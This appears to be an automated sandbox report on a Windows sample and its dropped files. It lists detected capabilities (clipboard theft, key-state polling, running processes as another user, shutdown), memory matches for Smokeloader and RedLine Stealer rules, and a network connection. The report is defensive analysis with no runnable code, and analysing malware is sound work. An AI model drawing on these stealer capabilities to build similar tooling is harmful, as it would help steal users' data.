Source: FCGCFCAFIIEBGCBFCAKKJKJJKK.16.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 1248.tmp.exe, 00000010.00000003.3192130266.000000002D013000.00000004.00000020.00020000.00000000.sdmp, FCGCFCAFIIEBGCBFCAKKJKJJKK.16.dr String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: 1248.tmp.exe, 00000010.00000002.3346073741.000000000045A000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: 1248.tmp.exe, 00000010.00000003.3192130266.000000002D013000.00000004.00000020.00020000.00000000.sdmp, FCGCFCAFIIEBGCBFCAKKJKJJKK.16.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown HTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.5:49978 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004050CD
Contains functionality to modify clipboard data
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002D4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 15_2_002D4830
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_004016E3 __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep, 15_2_004016E3
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_00402849 InternetReadFile,_strlen,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,GlobalFree, 15_2_00402849
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002D4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 15_2_002D4632
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004044A5
Potential key logger detected (key state polling based)
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002ED164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 15_2_002ED164

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000010.00000002.3348010697.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000010.00000002.3347378928.00000000006B3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C19B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 16_2_6C19B700
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C19B8C0 rand_s,NtQueryVirtualMemory, 16_2_6C19B8C0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C19B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 16_2_6C19B910
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C13F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 16_2_6C13F280
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002C4254: CreateFileW,DeviceIoControl,CloseHandle, 15_2_002C4254
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002B8F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 15_2_002B8F2E
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx, 0_2_00403883
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002C5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 15_2_002C5778
Creates files inside the system directory
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe File created: C:\Windows\RoutesDeaf Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe File created: C:\Windows\HumanitySurgery Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe File created: C:\Windows\PriorityAvoiding Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe File created: C:\Windows\EnvelopeTed Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe File created: C:\Windows\LeadUnits Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe File created: C:\Windows\UcDildos Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Code function: 0_2_0040497C 0_2_0040497C
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Code function: 0_2_00406ED2 0_2_00406ED2
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Code function: 0_2_004074BB 0_2_004074BB
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002823F5 15_2_002823F5
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002E8400 15_2_002E8400
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_00296502 15_2_00296502
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_0029265E 15_2_0029265E
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_0026E6F0 15_2_0026E6F0
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_0028282A 15_2_0028282A
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002989BF 15_2_002989BF
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002E0A3A 15_2_002E0A3A
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_00296A74 15_2_00296A74
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_0028CD51 15_2_0028CD51
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002BEDB2 15_2_002BEDB2
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002C8E44 15_2_002C8E44
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002E0EB7 15_2_002E0EB7
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_00296FE6 15_2_00296FE6
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_0026B020 15_2_0026B020
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002833B7 15_2_002833B7
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_0028F409 15_2_0028F409
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_0027D45D 15_2_0027D45D
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002694E0 15_2_002694E0
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_0027F628 15_2_0027F628
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_00261663 15_2_00261663
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_0026F6A0 15_2_0026F6A0
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002816B4 15_2_002816B4
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002878C3 15_2_002878C3
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_00281BA8 15_2_00281BA8
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_0028DBA5 15_2_0028DBA5
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_00269C80 15_2_00269C80
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_00299CE5 15_2_00299CE5
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_0027DD28 15_2_0027DD28
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_00281FC0 15_2_00281FC0
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_0028BFD6 15_2_0028BFD6
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_0041504B 15_2_0041504B
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_00429162 15_2_00429162
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_004081FB 15_2_004081FB
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_004381A3 15_2_004381A3
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_004285C4 15_2_004285C4
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_0042E6FA 15_2_0042E6FA
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_004296A0 15_2_004296A0
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_004177EF 15_2_004177EF
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_00414865 15_2_00414865
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_004388B9 15_2_004388B9
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_00428936 15_2_00428936
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_0040FAAB 15_2_0040FAAB
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_00428BE0 15_2_00428BE0
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_00419BEF 15_2_00419BEF
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_0043EC44 15_2_0043EC44
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_0042FCF0 15_2_0042FCF0
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_00428EA7 15_2_00428EA7
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C1335A0 16_2_6C1335A0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C175C10 16_2_6C175C10
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C182C10 16_2_6C182C10
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C1AAC00 16_2_6C1AAC00
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C1A542B 16_2_6C1A542B
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C1A545C 16_2_6C1A545C
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C145440 16_2_6C145440
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C146C80 16_2_6C146C80
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C1934A0 16_2_6C1934A0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C19C4A0 16_2_6C19C4A0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C15D4D0 16_2_6C15D4D0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C1464C0 16_2_6C1464C0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C176CF0 16_2_6C176CF0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C13D4E0 16_2_6C13D4E0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C160512 16_2_6C160512
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C15ED10 16_2_6C15ED10
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C14FD00 16_2_6C14FD00
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C170DD0 16_2_6C170DD0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C1985F0 16_2_6C1985F0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C177E10 16_2_6C177E10
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C185600 16_2_6C185600
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C199E30 16_2_6C199E30
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C159E50 16_2_6C159E50
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C173E50 16_2_6C173E50
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C154640 16_2_6C154640
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C182E4E 16_2_6C182E4E
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C13C670 16_2_6C13C670
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C1A6E63 16_2_6C1A6E63
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C155E90 16_2_6C155E90
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C19E680 16_2_6C19E680
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C194EA0 16_2_6C194EA0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C13BEF0 16_2_6C13BEF0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C14FEF0 16_2_6C14FEF0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C1A76E3 16_2_6C1A76E3
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C177710 16_2_6C177710
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C149F00 16_2_6C149F00
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C1877A0 16_2_6C1877A0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C166FF0 16_2_6C166FF0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C13DFE0 16_2_6C13DFE0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C147810 16_2_6C147810
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C17B820 16_2_6C17B820
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C184820 16_2_6C184820
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C158850 16_2_6C158850
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C15D850 16_2_6C15D850
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C17F070 16_2_6C17F070
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C1660A0 16_2_6C1660A0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C1A50C7 16_2_6C1A50C7
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C15C0E0 16_2_6C15C0E0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C1758E0 16_2_6C1758E0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C15A940 16_2_6C15A940
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C18B970 16_2_6C18B970
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C1AB170 16_2_6C1AB170
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C14D960 16_2_6C14D960
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C175190 16_2_6C175190
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C192990 16_2_6C192990
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C16D9B0 16_2_6C16D9B0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C13C9A0 16_2_6C13C9A0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C179A60 16_2_6C179A60
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C1ABA90 16_2_6C1ABA90
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C14CAB0 16_2_6C14CAB0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C1A2AB0 16_2_6C1A2AB0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C1322A0 16_2_6C1322A0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C164AA0 16_2_6C164AA0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C178AC0 16_2_6C178AC0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C151AF0 16_2_6C151AF0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C17E2F0 16_2_6C17E2F0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C17D320 16_2_6C17D320
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C135340 16_2_6C135340
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C14C370 16_2_6C14C370
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C13F380 16_2_6C13F380
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C1A53C8 16_2_6C1A53C8
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C2BAC30 16_2_6C2BAC30
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C2A6C00 16_2_6C2A6C00
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C1EAC60 16_2_6C1EAC60
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C1DECC0 16_2_6C1DECC0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C23ECD0 16_2_6C23ECD0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C368D20 16_2_6C368D20
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C2AED70 16_2_6C2AED70
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C30AD50 16_2_6C30AD50
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C1E4DB0 16_2_6C1E4DB0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C276D90 16_2_6C276D90
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C36CDC0 16_2_6C36CDC0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C2C0E20 16_2_6C2C0E20
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C27EE70 16_2_6C27EE70
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C266E90 16_2_6C266E90
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C1EAEC0 16_2_6C1EAEC0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C280EC0 16_2_6C280EC0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C1E6F10 16_2_6C1E6F10
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C320F20 16_2_6C320F20
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C2A2F70 16_2_6C2A2F70
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C24EF40 16_2_6C24EF40
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C328FB0 16_2_6C328FB0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C1EEFB0 16_2_6C1EEFB0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C2BEFF0 16_2_6C2BEFF0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C1E0FE0 16_2_6C1E0FE0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C230820 16_2_6C230820
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C26A820 16_2_6C26A820
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C2B4840 16_2_6C2B4840
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C2E68E0 16_2_6C2E68E0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C236900 16_2_6C236900
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C218960 16_2_6C218960
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C2709A0 16_2_6C2709A0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C29A9A0 16_2_6C29A9A0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C2A09B0 16_2_6C2A09B0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C2FC9E0 16_2_6C2FC9E0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C2149F0 16_2_6C2149F0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C298A30 16_2_6C298A30
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C28EA00 16_2_6C28EA00
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C25CA70 16_2_6C25CA70
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C25EA80 16_2_6C25EA80
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C280BA0 16_2_6C280BA0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C2E6BE0 16_2_6C2E6BE0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C244420 16_2_6C244420
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C26A430 16_2_6C26A430
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C1F8460 16_2_6C1F8460
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C30A480 16_2_6C30A480
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C2264D0 16_2_6C2264D0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C27A4D0 16_2_6C27A4D0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C242560 16_2_6C242560
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C280570 16_2_6C280570
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C328550 16_2_6C328550
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C238540 16_2_6C238540
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C2E4540 16_2_6C2E4540
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C1D45B0 16_2_6C1D45B0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C2AA5E0 16_2_6C2AA5E0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C26E5F0 16_2_6C26E5F0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C23C650 16_2_6C23C650
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C23E6E0 16_2_6C23E6E0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C27E6E0 16_2_6C27E6E0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C2046D0 16_2_6C2046D0
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: String function: 6C36DAE0 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: String function: 6C36D930 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: String function: 6C1794D0 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: String function: 6C209B10 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: String function: 6C16CBE8 appears 134 times
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: String function: 004045C0 appears 317 times
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: String function: 6C203620 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: String function: 6C3609D0 appears 149 times
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Code function: String function: 004062A3 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: String function: 00410A3A appears 36 times
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: String function: 00280D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: String function: 00271A36 appears 34 times
